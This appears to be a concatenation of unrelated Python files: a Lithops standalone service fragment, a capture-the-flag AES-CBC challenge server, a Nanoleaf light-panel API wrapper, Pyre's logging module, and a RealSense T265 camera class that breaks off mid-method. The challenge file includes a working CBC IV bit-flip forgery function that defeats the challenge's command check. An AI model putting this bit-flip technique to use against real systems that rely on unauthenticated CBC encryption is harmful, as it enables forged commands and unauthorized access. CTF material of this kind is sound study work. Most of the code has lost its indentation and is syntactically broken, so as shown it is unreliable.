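    assert requests.get(base + '/ping').json() == {'response': 'pong'}
    print(requests.get(base + '/workers').json())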
def main():
global STANDALONE_CONFIG
global STANDALONE_HANDLER
global BUDGET_KEEPER
global MASTER_IP
os.makedirs(LITHOPS_TEMP_DIR, exist_ok=True)
with open(STANDALONE_CONFIG_FILE, 'r') as cf:
STANDALONE_CONFIG = json.load(cf)
# Delete ssh_key_filename
backend = STANDALONE_CONFIG['backend']
if 'ssh_key_filename' in STANDALONE_CONFIG[backend]:
del STANDALONE_CONFIG[backend]['ssh_key_filename']
vm_data_file = os.path.join(STANDALONE_INSTALL_DIR, 'access.data')
with open(vm_data_file, 'r') as ad:
MASTER_IP = json.load(ad)['ip_address']
BUDGET_KEEPER = BudgetKeeper(STANDALONE_CONFIG)
BUDGET_KEEPER.start()
STANDALONE_HANDLER = BUDGET_KEEPER.sh
server = WSGIServer(('0.0.0.0', STANDALONE_SERVICE_PORT),
app, log=app.logger)
server.serve_forever()
if __name__ == '__main__':
main()
|
babycrypto2.py
|
#!/usr/bin/env python
from base64 import b64decode
from base64 import b64encode
import socket
import multiprocessing
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad
import hashlib
import sys
class AESCipher:
def __init__(self, key):
self.key = key
def encrypt(self, data):
iv = get_random_bytes(AES.block_size)
self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
return b64encode(iv + self.cipher.encrypt(pad(data,
AES.block_size)))
def encrypt_iv(self, data, iv):
self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
return b64encode(iv + self.cipher.encrypt(pad(data,
AES.block_size)))
def decrypt(self, data):
raw = b64decode(data)
self.cipher = AES.new(self.key, AES.MODE_CBC, raw[:AES.block_size])
return unpad(self.cipher.decrypt(raw[AES.block_size:]), AES.block_size)
flag = open("flag", "rb").read().strip()
AES_KEY = get_random_bytes(AES.block_size)
TOKEN = b64encode(get_random_bytes(AES.block_size*10-1))
COMMAND = [b'test',b'show']
PREFIX = b'Command: '
def run_server(client):
client.send(b'test Command: ' + AESCipher(AES_KEY).encrypt(PREFIX+COMMAND[0]+TOKEN) + b'\n')
while(True):
client.send(b'Enter your command: ')
tt = client.recv(1024).strip()
tt2 = AESCipher(AES_KEY).decrypt(tt)
client.send(tt2 + b'\n')
if tt2 == PREFIX+COMMAND[1]+TOKEN:
client.send(b'The flag is: ' + flag)
client.close()
break
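# Illustrative sketch (not part of the challenge server): the intended attack is
# a classic CBC IV bit-flip. The server hands out b64(iv + enc(pad(b'Command: '
# + b'test' + TOKEN))) and, when decrypting, treats the first 16 bytes of our
# input as the IV. Since the first plaintext block is P1 = AES_dec(C1) XOR IV,
# XOR-ing IV bytes 9..12 with (b'test' XOR b'show') turns the decrypted prefix
# into 'Command: show' while leaving TOKEN and the padding intact.
def forge_show_command(leaked_ciphertext_b64):
    raw = bytearray(b64decode(leaked_ciphertext_b64))
    offset = len(PREFIX)  # 'Command: ' is 9 bytes, inside the first block
    for i, (a, b) in enumerate(zip(b'test', b'show')):
        raw[offset + i] ^= a ^ b
    return b64encode(bytes(raw))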
if __name__ == '__main__':
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(('0.0.0.0', 16002))
server.listen(1)
while True:
client, address = server.accept()
process = multiprocessing.Process(target=run_server, args=(client, ))
process.daemon = True
process.start()
|
nanoleaf.py
|
"""nanoleafapi
This module is a Python 3 wrapper for the Nanoleaf OpenAPI.
It provides an easy way to use many of the functions available in the API.
It supports the Light Panels (previously Aurora), Canvas and Shapes (including Hexagons)."""
import json
from threading import Thread
import colorsys
import os
from typing import Any, List, Dict, Tuple, Union, Callable
from sseclient import SSEClient
import requests
# Preset colours
RED = (255, 0, 0)
ORANGE = (255, 165, 0)
YELLOW = (255, 255, 0)
GREEN = (0, 255, 0)
LIGHT_BLUE = (173, 216, 230)
BLUE = (0, 0, 255)
PINK = (255, 192, 203)
PURPLE = (128, 0, 128)
WHITE = (255, 255, 255)
class Nanoleaf():
"""The Nanoleaf class for controlling the Light Panels and Canvas
:ivar ip: IP of the Nanoleaf device
:ivar url: The base URL for requests
:ivar auth_token: The authentication token for the API
:ivar print_errors: True for errors to be shown, otherwise False
"""
def __init__(self, ip : str, auth_token : str =None, print_errors : bool =False):
"""Initalises Nanoleaf class with desired arguments.
:param ip: The IP address of the Nanoleaf device
:param auth_token: Optional, include Nanoleaf authentication
token here if required.
:param print_errors: Optional, True to show errors in the console
:type ip: str
:type auth_token: str
:type print_errors: bool
"""
self.ip = ip
self.print_errors = print_errors
self.url = "http://" + ip + ":16021/api/v1/" + str(auth_token)
self.check_connection()
if auth_token is None:
self.auth_token = self.create_auth_token()
if self.auth_token is None:
raise NanoleafRegistrationError()
else:
self.auth_token = auth_token
self.url = "http://" + ip + ":16021/api/v1/" + str(self.auth_token)
self.already_registered = False
def __error_check(self, code : int) -> bool:
"""Checks and displays error messages
Determines the request status code and prints the error, if print_errors
is true.
:param code: The error code
:returns: Returns True if request was successful, otherwise False
"""
if self.print_errors:
if code in (200, 204):
print(str(code) + ": Action performed successfully.")
return True
if code == 400:
print("Error 400: Bad request.")
elif code == 401:
print("Error 401: Unauthorized, invalid auth token. " +
"Please generate a new one.")
elif code == 403:
print("Error 403: Unauthorized, please hold the power " +
"button on the controller for 5-7 seconds, then try again.")
elif code == 404:
print("Error 404: Resource not found.")
elif code == 500:
print("Error 500: Internal server error.")
return False
return bool(code in (200, 204))
def create_auth_token(self) -> Union[str, None]:
"""Creates or retrives the device authentication token
The power button on the device should be held for 5-7 seconds, then
this method should be run. This will set both the auth_token and url
instance variables, and save the token in a file for future instances
of the Nanoleaf object.
:returns: Token if successful, None if not.
"""
file_path = os.path.expanduser('~') + os.path.sep + '.nanoleaf_token'
if os.path.exists(file_path) is False:
with open(file_path, 'w'):
pass
with open(file_path, 'r') as token_file:
tokens = token_file.readlines()
for token in tokens:
if token != "":
token = token.rstrip()
response = requests.get("http://" + self.ip + ":16021/api/v1/" + str(token))
if self.__error_check(response.status_code):
return token
response = requests.post('http://' + self.ip + ':16021/api/v1/new')
# process response
if response and response.status_code == 200:
data = json.loads(response.text)
if 'auth_token' in data:
                with open(file_path, 'a') as token_file:
                    token_file.write("\n" + data['auth_token'])
return data['auth_token']
return None
def delete_auth_token(self, auth_token : str) -> bool:
"""Deletes an authentication token
Deletes an authentication token and the .nanoleaf_token file if it
contains the auth token to delete. This token can no longer be used
as part of an API call to control the device. If required, generate
a new one using create_auth_token().
:param auth_token: The authentication token to delete.
:returns: True if successful, otherwise False
"""
url = "http://" + self.ip + ":16021/api/v1/" + str(auth_token)
response = requests.delete(url)
return self.__error_check(response.status_code)
def check_connection(self) -> None:
"""Ensures there is a valid connection"""
try:
requests.get(self.url, timeout=5)
except Exception as connection_error:
raise NanoleafConnectionError() from connection_error
def get_info(self) -> Dict[str, Any]:
"""Returns a dictionary of device information"""
response = requests.get(self.url)
return json.loads(response.text)
def get_name(self) -> str:
"""Returns the name of the current device"""
return self.get_info()['name']
def get_auth_token(self) -> str:
"""Returns the current auth token"""
return self.auth_token
def get_ids(self) -> List[int]:
"""Returns a list of all device ids"""
position_data = []
device_ids = []
info_data = self.get_info()
if ('panelLayout' in info_data and 'layout' in info_data['panelLayout'] and
'positionData' in info_data['panelLayout']['layout']):
position_data = info_data['panelLayout']['layout']['positionData']
# process position data
for data in position_data:
device_ids.append(data['panelId'])
return device_ids
@staticmethod
def get_custom_base_effect(anim_type : str ='custom', loop : bool =True) -> Dict[str, Any]:
"""Returns base custom effect dictionary"""
base_effect = {
'command': 'display',
'animType': anim_type,
'loop': loop,
'palette': []
}
return base_effect
#######################################################
#### POWER ####
#######################################################
def power_off(self) -> bool:
"""Powers off the lights
:returns: True if successful, otherwise False
"""
data = {"on" : {"value": False}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def power_on(self) -> bool:
"""Powers on the lights
:returns: True if successful, otherwise False
"""
data = {"on" : {"value": True}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def get_power(self) -> bool:
"""Returns the power status of the lights
:returns: True if on, False if off
"""
response = requests.get(self.url + "/state/on")
ans = json.loads(response.text)
return ans['value']
def toggle_power(self) -> bool:
"""Toggles the lights on/off"""
if self.get_power():
return self.power_off()
return self.power_on()
#######################################################
#### COLOUR ####
#######################################################
def set_color(self, rgb : Tuple[int, int, int]) -> bool:
"""Sets the colour of the lights
:param rgb: Tuple in the format (r, g, b)
:returns: True if successful, otherwise False
"""
hsv_colour = colorsys.rgb_to_hsv(rgb[0]/255, rgb[1]/255, rgb[2]/255)
hsv_colour_list = list(hsv_colour)
hsv_colour_list[0] *= 360
hsv_colour_list[1] *= 100
hsv_colour_list[2] *= 100
final_colour = [ int(x) for x in hsv_colour_list ]
data = {
"hue" : {"value": final_colour[0]},
"sat": {"value": final_colour[1]},
"brightness": {"value": final_colour[2], "duration": 0}
}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
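    # Worked example (sketch): set_color((0, 255, 0)) converts pure green to
    # HSV (1/3, 1.0, 1.0), which the scaling above turns into hue=120,
    # sat=100, brightness=100 before the PUT to the /state endpoint.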
#######################################################
#### ADJUST BRIGHTNESS ####
#######################################################
def set_brightness(self, brightness : int, duration : int =0) -> bool:
"""Sets the brightness of the lights
:param brightness: The required brightness (between 0 and 100)
:param duration: The duration over which to change the brightness
:returns: True if successful, otherwise False
"""
if brightness > 100 or brightness < 0:
raise ValueError('Brightness should be between 0 and 100')
data = {"brightness" : {"value": brightness, "duration": duration}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def increment_brightness(self, brightness : int) -> bool:
"""Increments the brightness of the lights
:param brightness: How much to increment the brightness, can
also be negative
:returns: True if successful, otherwise False
"""
data = {"brightness" : {"increment": brightness}}
response = requests.put(self.url + "/state", data = json.dumps(data))
return self.__error_check(response.status_code)
def get_brightness(self) -> int:
"""Returns the current brightness value of the lights"""
response = requests.get(self.url + "/state/brightness")
ans = json.loads(response.text)
return ans['value']
#######################################################
#### IDENTIFY ####
#######################################################
def identify(self) -> bool:
"""Runs the identify sequence on the lights
:returns: True if successful, otherwise False
"""
response = requests.put(self.url + "/identify")
return self.__error_check(response.status_code)
#######################################################
#### HUE ####
#######################################################
def set_hue(self, value : int) -> bool:
"""Sets the hue of the lights
:param value: The required hue (between 0 and 360)
:returns: True if successful, otherwise False
"""
if value > 360 or value < 0:
raise ValueError('Hue should be between 0 and 360')
data = {"hue" : {"value" : value}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def increment_hue(self, value : int) -> bool:
"""Increments the hue of the lights
:param value: How much to increment the hue, can also be negative
:returns: True if successful, otherwise False
"""
data = {"hue" : {"increment" : value}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def get_hue(self) -> int:
"""Returns the current hue value of the lights"""
response = requests.get(self.url + "/state/hue")
ans = json.loads(response.text)
return ans['value']
#######################################################
#### SATURATION ####
#######################################################
def set_saturation(self, value : int) -> bool:
"""Sets the saturation of the lights
:param value: The required saturation (between 0 and 100)
:returns: True if successful, otherwise False
"""
if value > 100 or value < 0:
raise ValueError('Saturation should be between 0 and 100')
data = {"sat" : {"value" : value}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def increment_saturation(self, value : int) -> bool:
"""Increments the saturation of the lights
        :param value: How much to increment the saturation, can also be
negative.
:returns: True if successful, otherwise False
"""
data = {"sat" : {"increment" : value}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def get_saturation(self) -> int:
"""Returns the current saturation value of the lights"""
response = requests.get(self.url + "/state/sat")
ans = json.loads(response.text)
return ans['value']
#######################################################
#### COLOUR TEMPERATURE ####
#######################################################
def set_color_temp(self, value : int) -> bool:
"""Sets the white colour temperature of the lights
        :param value: The required colour temperature (between 1200 and 6500)
:returns: True if successful, otherwise False
"""
if value > 6500 or value < 1200:
raise ValueError('Colour temp should be between 1200 and 6500')
data = {"ct" : {"value" : value}}
        response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def increment_color_temp(self, value : int) -> bool:
"""Sets the white colour temperature of the lights
:param value: How much to increment the colour temperature by, can also
be negative.
:returns: True if successful, otherwise False
"""
data = {"ct" : {"increment" : value}}
        response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def get_color_temp(self) -> int:
"""Returns the current colour temperature of the lights"""
response = requests.get(self.url + "/state/ct")
ans = json.loads(response.text)
return ans['value']
#######################################################
#### COLOUR MODE ####
#######################################################
def get_color_mode(self) -> str:
"""Returns the colour mode of the lights"""
response = requests.get(self.url + "/state/colorMode")
return json.loads(response.text)
#######################################################
#### EFFECTS ####
#######################################################
def get_current_effect(self) -> str:
"""Returns the currently selected effect
If the name of the effect isn't available, this will return
*Solid*, *Dynamic* or *Static* instead.
:returns: Name of the effect or type if unavailable.
"""
response = requests.get(self.url + "/effects/select")
return json.loads(response.text)
def set_effect(self, effect_name : str) -> bool:
"""Sets the effect of the lights
:param effect_name: The name of the effect
:returns: True if successful, otherwise False
"""
data = {"select": effect_name}
response = requests.put(self.url + "/effects", data=json.dumps(data))
return self.__error_check(response.status_code)
def list_effects(self) -> List[str]:
"""Returns a list of available effects"""
response = requests.get(self.url + "/effects/effectsList")
return json.loads(response.text)
def write_effect(self, effect_dict : Dict['str', Any]) -> bool:
"""Writes a user-defined effect to the panels
:param effect_dict: The effect dictionary in the format
described here: https://forum.nanoleaf.me/docs/openapi#_u2t4jzmkp8nt
:raises NanoleafEffectCreationError: When invalid effect dictionary is provided.
:returns: True if successful, otherwise False
"""
response = requests.put(self.url + "/effects", data=json.dumps({"write": effect_dict}))
if response.status_code == 400:
raise NanoleafEffectCreationError("Invalid effect dictionary")
return self.__error_check(response.status_code)
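    # Minimal sketch of an effect dictionary accepted by write_effect(), based
    # on get_custom_base_effect() and the animData strings built in pulsate()
    # and flow() below. The panel id and object name are illustrative only:
    #
    #   effect = Nanoleaf.get_custom_base_effect()        # class name assumed
    #   effect['animData'] = "1 101 1 255 0 0 0 10"       # one panel, one red frame
    #   nl.write_effect(effect)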
def effect_exists(self, effect_name : str) -> bool:
"""Verifies whether an effect exists
:param effect_name: Name of the effect to verify
:returns: True if effect exists, otherwise False
"""
response = requests.get(self.url + "/effects/effectsList")
if effect_name in json.loads(response.text):
return True
return False
def pulsate(self, rgb : Tuple[int, int, int], speed : float = 1) -> bool:
"""Displays a pulsating effect on the device with two colours
:param rgb: A tuple containing the RGB colour to pulsate in the format (r, g, b).
:param speed: The speed of the transition between colours in seconds,
with a maximum of 1 decimal place.
:raises NanoleafEffectCreationError: When an invalid rgb value is provided.
:returns: True if the effect was created and displayed successfully, otherwise False
"""
if len(rgb) != 3:
raise NanoleafEffectCreationError("There must be three values in the " +
"RGB tuple! E.g., (255, 0, 0)")
for colour in rgb:
if not isinstance(colour, int):
raise NanoleafEffectCreationError("All values in the tuple must be " +
"integers! E.g., (255, 0, 0)")
if colour < 0 or colour > 255:
raise NanoleafEffectCreationError("All values in the tuple must be " +
"integers between 0 and 255! E.g., (255, 0, 0)")
base_effect = self.get_custom_base_effect()
ids = self.get_ids()
anim_data = str(len(ids))
frame_string = ""
for device_id in ids:
frame_string += " {id} 2".format(id=device_id)
r, g, b = rgb[0], rgb[1], rgb[2]
frame_string += " {r} {g} {b} 0 {speed} 0 0 0 0 {speed_2}".format(
r=r, g=g, b=b, speed=int(speed*10), speed_2=int(speed*10))
base_effect['animData'] = anim_data + frame_string
return self.write_effect(base_effect)
def flow(self, rgb_list : List[Tuple[int, int, int]], speed : float = 1) -> bool:
"""Displays a sequence of specified colours on the device.
        :param rgb_list: A list of tuples containing RGB colours to flow between in the format (r, g, b).
:param speed: The speed of the transition between colours in seconds, with a maximum of
1 decimal place.
:raises NanoleafEffectCreationError: When an invalid rgb_list is provided.
:returns: True if the effect was created and displayed successfully, otherwise False
"""
if len(rgb_list) <= 1:
raise NanoleafEffectCreationError("There has to be more than one tuple in " +
"the RGB list for this effect! E.g., [(255, 0, 0), (0, 0, 0)]")
for tup in rgb_list:
if len(tup) != 3:
raise NanoleafEffectCreationError("There must be three values in the " +
"RGB tuple! E.g., (255, 0, 0)")
for colour in tup:
if not isinstance(colour, int):
raise NanoleafEffectCreationError("All values in the tuple must " +
"be integers! E.g., (255, 0, 0)")
if colour < 0 or colour > 255:
raise NanoleafEffectCreationError("All values in the tuple must " +
"be integers between 0 and 255! E.g., (255, 0, 0)")
base_effect = self.get_custom_base_effect()
ids = self.get_ids()
anim_data = str(len(ids))
frame_string = ""
for device_id in ids:
frame_string += " {id} {numFrames}".format(id=device_id, numFrames=len(rgb_list))
for rgb in rgb_list:
r, g, b = rgb[0], rgb[1], rgb[2]
frame_string += " {r} {g} {b} 0 {speed}".format(r=r, g=g, b=b, speed=int(speed*10))
base_effect['animData'] = anim_data + frame_string
return self.write_effect(base_effect)
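    # Example (sketch, assuming an instantiated object `nl`): cycle through
    # red, green and blue with a one-second transition between colours.
    #
    #   nl.flow([(255, 0, 0), (0, 255, 0), (0, 0, 255)], speed=1)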
def spectrum(self, speed : float = 1) -> bool:
"""Displays a spectrum cycling effect on the device
:param speed: The speed of the transition between colours in seconds,
with a maximum of 1 decimal place.
:returns: True if the effect was created and displayed successfully,
otherwise False
"""
base_effect = self.get_custom_base_effect()
ids = self.get_ids()
spectrum_palette = []
for hue in range(0, 360, 10):
(r, g, b) = colorsys.hsv_to_rgb(hue/360, 1.0, 1.0)
spectrum_palette.append((int(255*r), int(255*g), int(255*b)))
anim_data = str(len(ids))
frame_string = ""
for device_id in ids:
frame_string += " {id} {numFrames}".format(id=device_id,
numFrames=len(spectrum_palette))
for rgb in spectrum_palette:
r, g, b = rgb[0], rgb[1], rgb[2]
frame_string += " {r} {g} {b} 0 {speed}".format(r=r, g=g, b=b, speed=int(speed*10))
base_effect['animData'] = anim_data + frame_string
return self.write_effect(base_effect)
#######################################################
#### LAYOUT ####
#######################################################
def get_layout(self) -> Dict[str, Any]:
"""Returns the device layout information"""
response = requests.get(self.url + "/panelLayout/layout")
return json.loads(response.text)
#######################################################
#### EVENTS ####
#######################################################
def register_event(self, func : Callable[[Dict[str, Any]], Any],
event_types : List[int]) -> None:
"""Starts a thread to register and listen for events
Creates an event listener. This method can only be called once per
program run due to API limitations.
        :param func: The function to run when an event is received (this
            should be defined by the user with one argument). This function
            will receive the event as a dictionary.
:param event_types: A list containing up to 4 numbers from
1-4 corresponding to the relevant events to be registered for.
1 = state (power/brightness),
2 = layout,
3 = effects,
4 = touch (Canvas only)
"""
if self.already_registered:
print("Cannot register events more than once.")
return
if len(event_types) > 4 or len(event_types) < 1:
raise Exception("The number of events to register for must be" +
"between 1-4")
for event in event_types:
if event < 1 or event > 4:
raise Exception("Valid event types must be between 1-4")
self.already_registered = True
thread = Thread(target=self.__event_listener, args=(func, set(event_types)))
thread.daemon = True
thread.start()
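    # Usage sketch (assuming an instantiated object `nl`): print every state
    # and effects event as it arrives. The callback receives each event as a
    # dictionary, as described in the docstring above.
    #
    #   def on_event(event):
    #       print(event)
    #
    #   nl.register_event(on_event, [1, 3])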
def __event_listener(self, func : Callable[[Dict[str, Any]], Any],
event_types : List[int]) -> None:
"""Listens for events and passes event data to the user-defined
function."""
url = self.url + "/events?id="
for event in event_types:
url += str(event) + ","
client = SSEClient(url[:-1])
for event in client:
func(json.loads(str(event)))
#######################################################
#### ERRORS ####
#######################################################
class NanoleafRegistrationError(Exception):
"""Raised when an issue during device registration."""
def __init__(self) -> None:
message = """Authentication token generation failed. Hold the power
button on your Nanoleaf device for 5-7 seconds and try again."""
super().__init__(message)
class NanoleafConnectionError(Exception):
"""Raised when the connection to the Nanoleaf device fails."""
def __init__(self) -> None:
message = "Connection to Nanoleaf device failed. Is this the correct IP?"
super().__init__(message)
class NanoleafEffectCreationError(Exception):
"""Raised when one of the custom effects creation has incorrect arguments."""
|
log.py
|
# Copyright (c) 2016-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
import argparse
import copy
import io
import logging
import os
import re
import sys
import threading
import time
from typing import List, Optional, Sequence # noqa
from . import filesystem
LOG = logging.getLogger(__name__) # type: logging.Logger
PERFORMANCE = 15 # type: int
PROMPT = 50 # type: int
SUCCESS = 60 # type: int
stdout = io.StringIO(newline="") # type: io.StringIO
class Color:
YELLOW = "\033[33m" # type: str
RED = "\033[31m" # type: str
GREEN = "\033[32m" # type: str
class Format:
BOLD = "\033[1m" # type: str
CLEAR_LINE = "\x1b[0G\x1b[K" # type: str
CLEAR = "\033[0m" # type: str
TRUNCATE_OVERFLOW = "\033[?7l" # type: str
WRAP_OVERFLOW = "\033[?7h" # type: str
NEWLINE = "\n" # type: str
CURSOR_UP_LINE = "\x1b[1A" # type: str
HIDE_CURSOR = "\x1b[?25l" # type: str
SHOW_CURSOR = "\x1b[?25h" # type: str
class Character:
LAMBDA = "ƛ" # type: str
class SectionFormatter(logging.Formatter):
def __init__(self) -> None:
super(SectionFormatter, self).__init__("%(asctime)s %(levelname)s %(message)s")
def format(self, record: logging.LogRecord) -> str:
formatted = super(SectionFormatter, self).format(record)
return re.sub(r"DEBUG \[(.*)\]", r"\1", formatted)
class TimedStreamHandler(logging.StreamHandler):
THRESHOLD = 0.5 # type: float
LINE_BREAKING_LEVELS = ["ERROR", "WARNING", "SUCCESS"] # type: Sequence[str]
_terminate = False # type: bool
_last_update = 0.0 # type: float
def __init__(self) -> None:
super(TimedStreamHandler, self).__init__()
self.setFormatter(logging.Formatter("%(message)s"))
self.terminator = "" # type: str
self.setLevel(logging.INFO)
self._record = None # type: Optional[logging.LogRecord]
self._last_record = None # type: Optional[logging.LogRecord]
self._active_lines = 0 # type: int
# Preamble preparing terminal.
sys.stderr.write(
Format.NEWLINE
+ Format.TRUNCATE_OVERFLOW
+ Format.CLEAR_LINE
+ Format.CURSOR_UP_LINE
+ Format.HIDE_CURSOR
)
thread = threading.Thread(target=self._thread)
thread.daemon = True
thread.start()
def clear_lines(self) -> str:
if self._active_lines == 0:
return ""
return Format.CLEAR_LINE + "".join(
[
Format.CURSOR_UP_LINE + Format.CLEAR_LINE
for n in range(self._active_lines - 1)
]
)
def emit(self, record: logging.LogRecord, age: Optional[float] = None) -> None:
self._last_record = record
suffix = ""
color = ""
active_lines = record.msg.count("\n") + 1
if record.levelname in self.LINE_BREAKING_LEVELS:
record.msg += "\n"
if record.levelname == "ERROR":
color = Color.RED
self._record = None
active_lines = 0
elif record.levelname == "WARNING":
color = Color.YELLOW
self._record = None
active_lines = 0
elif record.levelname == "PROMPT":
color = Color.YELLOW
self._record = None
active_lines = 0
elif record.levelname == "SUCCESS":
self._record = None
active_lines = 0
elif age:
if age > 10:
color = Color.YELLOW
if age > 30:
color = Color.RED
suffix = " {}[{:.1f}s]{}".format(
color if color else "", age, Format.CLEAR if color else ""
)
else:
self._record = record
self._last_update = time.time()
timed_record = copy.copy(record)
timed_record.msg = (
"{clear_line}{color} {cursor}{clear} " "{message}{suffix}"
).format(
clear_line=self.clear_lines(),
color=color,
cursor=Character.LAMBDA,
clear=Format.CLEAR,
message=record.msg,
suffix=suffix,
)
self._active_lines = active_lines
super(TimedStreamHandler, self).emit(timed_record)
def _thread(self) -> None:
while not self._terminate:
if self._record:
age = time.time() - self._last_update
if age > self.THRESHOLD:
self.emit(self._record, age)
time.sleep(0.1)
def terminate(self) -> None:
last_record = self._last_record
if last_record and last_record.levelname not in self.LINE_BREAKING_LEVELS:
sys.stderr.write("\n")
# Reset terminal.
sys.stderr.write(Format.WRAP_OVERFLOW + Format.SHOW_CURSOR)
sys.stderr.flush()
self._terminate = True
def initialize(arguments: argparse.Namespace) -> None:
if arguments.noninteractive:
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(SectionFormatter())
stream_handler.setLevel(logging.DEBUG)
arguments.timed_stream_handler = None
else:
stream_handler = TimedStreamHandler()
arguments.timed_stream_handler = stream_handler
handlers = [stream_handler] # type: List[logging.Handler]
if not arguments.noninteractive:
pyre_directory = filesystem.make_pyre_directory()
file_handler = logging.FileHandler(os.path.join(pyre_directory, "pyre.stderr"))
file_handler.setFormatter(SectionFormatter())
file_handler.setLevel(logging.DEBUG)
handlers.append(file_handler)
logging.addLevelName(PERFORMANCE, "PERFORMANCE")
logging.addLevelName(PROMPT, "PROMPT")
logging.addLevelName(SUCCESS, "SUCCESS")
logging.basicConfig(level=logging.DEBUG, handlers=handlers)
def cleanup(arguments: argparse.Namespace) -> None:
if arguments.timed_stream_handler:
arguments.timed_stream_handler.terminate()
output = stdout.getvalue()
if output:
sys.stdout.write(output + "\n")
class Buffer:
THRESHOLD = 0.1 # type: float
_flushed = False # type: bool
def __init__(self, section: str, data: List[str]) -> None:
self._section = section # type: str
self._data = data # type: List[str]
self._lock = threading.RLock() # type: threading.RLock
thread = threading.Thread(target=self._thread)
thread.daemon = True
thread.start()
def append(self, line: str) -> None:
self._data.append(line)
def flush(self) -> None:
with self._lock:
if self._flushed is True:
return
self._flushed = True
message = "\n".join(self._data)
if self._section == "ERROR":
LOG.error(message)
elif self._section == "INFO":
LOG.info(message)
elif self._section == "DUMP":
LOG.warning(message)
elif self._section == "WARNING":
LOG.warning(message)
elif self._section == "PROGRESS":
LOG.info(message)
elif self._section == "PARSER":
LOG.error(message)
else:
LOG.debug("[%s] %s", self._section, message)
def _thread(self) -> None:
time.sleep(self.THRESHOLD)
with self._lock:
if not self._flushed:
self.flush()
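# Usage sketch (illustrative, not taken from pyre itself): a Buffer collects
# lines for a named section and flushes them to the matching log level either
# explicitly or after THRESHOLD seconds via its background thread.
#
#   buffer = Buffer("WARNING", ["first line"])
#   buffer.append("second line")
#   buffer.flush()   # logged once as a warning; later flushes are no-ops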
def get_yes_no_input(prompt: str) -> bool:
choice = get_input(prompt, suffix=" [Y/n] ")
return choice.lower() in ["", "y", "ye", "yes"]
def get_optional_input(prompt: str, default: str) -> str:
result = get_input(prompt, suffix=" (Default: `{}`): ".format(default))
if result == "":
return default
return result
def get_input(prompt: str, suffix: str = "") -> str:
LOG.log(PROMPT, prompt + suffix)
return input().strip()
|
camera_t265.py
|
#!/usr/bin/env python3
import sys
sys.path.append("/usr/local/lib/")
import os
import time
from threading import Thread
import transformations as tf
import numpy as np
import math as m
import csv
import pyrealsense2 as rs
from mycelium.components import Camera, RedisBridge
class CameraT265(Camera):
def __init__(self):
self.enable_pose_stream = False
super().__init__(Camera.TYPE_T265)
self._setup_save_dir()
def _setup_parameters(self):
self.scale_factor = self.cfg.t265['scale_factor']
self.jump_threshold = self.cfg.t265['jump_threshold']
self.jump_speed_threshold = self.cfg.t265['jump_speed_threshold']
self.compass_enabled = self.cfg.t265['compass_enabled']
self.heading_north_yaw = None
self.rb_0 = RedisBridge(db=self.rd_cfg.databases['robot'])
if self.compass_enabled:
att = self.rb_0.get_key('ATTITUDE')
if att is not None:
self.heading_north_yaw = att['yaw']
else:
self.compass_enabled = False
self.logger.log_warn("Failed to enable compass, could not retrieve attitude yaw")
self._initialize_compute_vars()
# body offset - see initial script
self.metadata = ['enable_pose_stream']
def _initialize_compute_vars(self):
self.prev_data = None
self.reset_counter = 1
        self.current_confidence_level = None
# Initialize with camera orientation
self.H_aeroRef_T265Ref = np.array([[0,0,-1,0],[1,0,0,0],[0,-1,0,0],[0,0,0,1]])
xr = m.radians(self.cfg.t265['camera_rot_x'])
yr = m.radians(self.cfg.t265['camera_rot_y'])
zr = m.radians(self.cfg.t265['camera_rot_z'])
self.H_T265body_aeroBody = (tf.euler_matrix(xr, yr, zr)).dot(np.linalg.inv(self.H_aeroRef_T265Ref))
self.H_aeroRef_aeroBody = None
# V_aeroRef_aeroBody # vision speed estimate message
# H_aeroRef_PrevAeroBody # vision position delta message
self.frames = None
self.pose_estimate_data = None
def _setup_threads(self):
super()._setup_threads()
self.threads.append(Thread(target=self._save_pos_estimate))
def _save_pos_estimate(self):
csv_file = self.save_data_dir + 't265_pos_estimate.csv'
file_exists = os.path.exists(csv_file)
with open(csv_file, 'a+', newline='') as csvfile:
csvwriter = csv.writer(csvfile, delimiter=',')
if not file_exists:
header = [
'current_time_us',
'local_x_pos',
'local_y_pos',
'local_z_pos',
'roll_angle',
'pitch_angle',
'yaw_angle',
'covariance',
'reset_counter',
'gps_1_lat',
'gps_1_lon',
'gps_1_fix_type',
'gps_2_lat',
'gps_2_lon',
'gps_2_fix_type'
]
csvwriter.writerow(header)
while not self.exit_threads:
self.rb_i.add_key(self.pose_estimate_data, self.camera_type, 'vision_position_estimate', expiry=self.cfg.t265['save_redis_expiry'])
self._save_csv(csvwriter, self.pose_estimate_data)
def _save_csv(self, csvwriter, data):
if data:
try:
data += self._get_gps_data()
csvwriter.writerow(data)
except Exception as e:
self.logger.log_warn("Could not write pose data to csv: %s" % e)
    def _realsense_notification_callback(self, notif):
        self.logger.log_info(notif)
def _open_pipe(self):
self.pipe = rs.pipeline()
config = rs.config()
config.enable_stream(rs.stream.pose)
device = config.resolve(self.pipe).get_device()
pose_sensor = device.first_pose_sensor()
pose_sensor.set_notifications_callback(self._realsense_notification_callback)
self.enable_pose_stream = True
self.pipe.start(config)
def _process_frames(self):
self.frames = self.pipe.wait_for_frames()
pose = self.frames.get_pose_frame()
if pose:
# Pose data consists of translation and rotation
data = pose.get_pose_data()
# Confidence level value from T265: 0-3, remapped to 0 - 100: 0% - Failed / 33.3% - Low / 66.6% - Medium / 100% - High
